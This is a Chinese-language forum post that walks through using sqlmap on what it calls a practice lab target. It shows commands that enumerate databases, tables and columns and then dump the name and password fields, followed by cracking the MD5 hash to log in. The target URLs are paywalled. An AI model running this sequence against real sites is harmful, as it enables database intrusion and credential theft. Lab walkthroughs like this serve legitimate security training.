无名商城论坛

搜索
查看: 268|回复: 0

[其他技术] 实战利用sqlmap渗透

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 17:52:59 | 显示全部楼层 |阅读模式
使用工具:sqlmap
直接sqlmap -u
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
检测注入点之后
sqlmap -u sqlmap -u sqlmap -u
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
--dbs
查找数据库发现mozhe_discuz_stormgroup数据库即为我们需要的sqlmap -u
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
-D mozhe_discuz_stormgroup --tables
猜测表名查找到stormgroup_member的表,想必用户信息就在其中sqlmap -u
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
-D mozhe_discuz_stormgroup -T stormgroup_member --columns
查找字段列名可以很清楚地看到存在name以及password的字段列故sqlmap -u
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
-D mozhe_discuz_stormgroup -T stormgroup_member -C name,password --dump
查看字段随机看到name为mozhepassword为一串MD5加密代码,解密后即为密码使用name和password登录即可
最后说一句这个是找的靶机,别傻乎乎去瞎找网站扫描
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表